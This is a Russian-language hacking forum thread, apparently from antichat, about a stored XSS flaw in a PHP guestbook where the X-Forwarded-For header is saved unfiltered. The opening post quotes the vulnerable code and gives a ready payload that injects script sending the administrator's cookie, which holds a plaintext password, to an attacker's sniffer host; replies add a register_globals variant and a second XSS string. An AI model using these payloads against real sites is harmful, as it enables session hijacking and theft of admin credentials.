Недавно ред саратов писал об дырке в этой же буке связанной с файлом пароля, где он хранится в зашифрованном виде, в версии 1.3 эту багу пофиксили, но пароль в куках хранят в открытом виде, значит нам нужна иксс атака)
ошибка заключается в отсутствии фильтрации поля: TTP_X_FORWARDED_FOR
в 103-107 строчках файла index.php
if(empty($ip)):
if (getenv('HTTP_X_FORWARDED_FOR')) { $ip=getenv('HTTP_X_FORWARDED_FOR'); }
else { $ip=getenv('REMOTE_ADDR');}
endif;
мы же можем изменить это поле как угодно! например юзая Mozilla Firefox и плагин ModifyHeaders.
меняем поле TTP_X_FORWARDED_FOR на: 67.22.83.13><script>img = new Image();img.src = "http://test1.ru/s.php?out="+document.cookie;</script><!-- XSS -- где айпи - отображаемый админу (фальшивый) ну а http://test1.ru/s.php - адрес нашего снифера.
теперь, запостив мессагу с таким TTP_X_FORWARDED_FOR, будем ждать, пока админ не зайдет в админку, и нам на снифер не утекут его куки с ОТКРЫТЫМ(!) паролем.

Следуя пословице лучше 1 раз увидеть, чем 100 раз услышать, ну или 10 раз прочитать, качаем видео (800кб):
http://slil.ru/24013333
В архиве с видео лежит код снифера и более подробный анализ баги.
ЗЫ: плиз, поместите видео на video.antichat.ru :)))
ЗЫЫ: помоему это статья, т.к. есть анализ дырки, а не просто соль) но если модеры так не считают, перенесите плиз в более подходящий раздел.

Неплохо. Как-то давно искал баги в этой госте, не нашел ничего. Но то, что пасс в открытом виде хранится - просто глупость автора.

по просьбе с аськи перезалил видео: http://slil.ru/24172858

TTP_X_FORWARDED_FOR
думаю стоит заменить на HTTP_X_FORWARDED_FOR

А легче просто вместо того чтобы заголовки изменять просто добавить еще одну post или get переменную $ip, если register_globals включены.
Тогда получится что-то вроде этого:
guest (http://ckyhc.t35.com/guest.html)

А я вот активку нарыл...
При добавлении сообщений куки сохраняются и активок куча.
"'/><script>alert(/xss/)</script>

Перезалейте видео на dump.ru

стотья? помойму надо в уязвимости такое постить